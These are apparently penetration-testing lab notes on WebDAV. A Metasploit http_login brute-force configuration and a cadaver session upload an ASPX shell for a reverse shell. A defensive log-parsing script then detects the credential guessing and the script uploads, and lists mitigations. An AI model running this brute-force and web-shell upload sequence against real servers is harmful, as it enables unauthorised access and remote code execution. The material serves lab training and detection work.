WebDAV
Brute Forcing Credentials
msfconsole -q
use auxiliary/scanner/http/http_login
set RHOSTS demo.ine.local
set AUTH_URI /webdav/
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
exploit
Authenticated Remote Execution:
cadaver 192.168.105.122
Authentication required for 192.168.105.122 on server `192.168.105.122':
Username: fmcsorley
Password:
dav:/> help
Available commands:
ls cd pwd put get mget mput
edit less mkcol cat delete rmcol copy
move lock unlock discover steal showlocks version
checkin checkout uncheckout history label propnames chexec
propget propdel propset search set open close
echo quit unset lcd lls lpwd logout
help describe about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/> upload
Unrecognised command. Type 'help' for a list of commands.
dav:/> put
The `put' command requires 1 argument:
put local [remote] : Upload local file
dav:/> put /home/kali/impacket/examples/shell.aspx
Uploading /home/kali/impacket/examples/shell.aspx to `/shell.aspx':
Progress: [=============================>] 100.0% of 3675 bytes succeeded.
With valid credentials we are able to log in and upload files to get a reverse shell.
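For the defensive side of the two steps above, an added example (not part of the original notes) that flags this sequence in web server logs: a run of 401 responses on the WebDAV path followed by a successful request from the same client, and a PUT of a server-executable file. The log lines, addresses, usernames, failure threshold and extension list are constructed assumptions.

```python
from collections import defaultdict

# Constructed IIS-style W3C log (sample data, not taken from the page).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2024-01-01 10:00:01 OPTIONS /webdav/ - 10.0.0.5 401
2024-01-01 10:00:01 OPTIONS /webdav/ - 10.0.0.5 401
2024-01-01 10:00:02 OPTIONS /webdav/ - 10.0.0.5 401
2024-01-01 10:00:02 OPTIONS /webdav/ - 10.0.0.5 401
2024-01-01 10:00:03 OPTIONS /webdav/ - 10.0.0.5 401
2024-01-01 10:00:03 OPTIONS /webdav/ alice 10.0.0.5 200
2024-01-01 10:04:10 PUT /webdav/shell.aspx alice 10.0.0.5 201
2024-01-01 11:00:00 PROPFIND /webdav/ - 10.0.0.9 401
2024-01-01 11:00:00 PROPFIND /webdav/ bob 10.0.0.9 207
2024-01-01 11:00:05 PUT /webdav/report.docx bob 10.0.0.9 201
"""

SCRIPT_EXTS = (".asp", ".aspx", ".ashx", ".php", ".jsp")  # assumed list
FAIL_THRESHOLD = 5  # assumed tuning value; one 401 is a normal auth challenge

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def detect(text, prefix="/webdav/"):
    """Return alerts for guessed logins and script uploads under prefix."""
    failures, alerts = defaultdict(int), []
    for e in parse_w3c(text):
        path, ip = e["cs-uri-stem"].lower(), e["c-ip"]
        if not path.startswith(prefix):
            continue
        if e["sc-status"] == "401":
            failures[ip] += 1
        elif e["sc-status"].startswith("2"):
            if failures[ip] >= FAIL_THRESHOLD:  # success right after a burst
                alerts.append(("login_after_failures", ip, e["cs-username"]))
            failures[ip] = 0
            if e["cs-method"] == "PUT" and path.endswith(SCRIPT_EXTS):
                alerts.append(("script_upload", ip, path))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Both alerts point at the same mitigations: lockout or rate limiting on the WebDAV realm, and denying script execution (or PUT of script extensions) in any directory that accepts uploads.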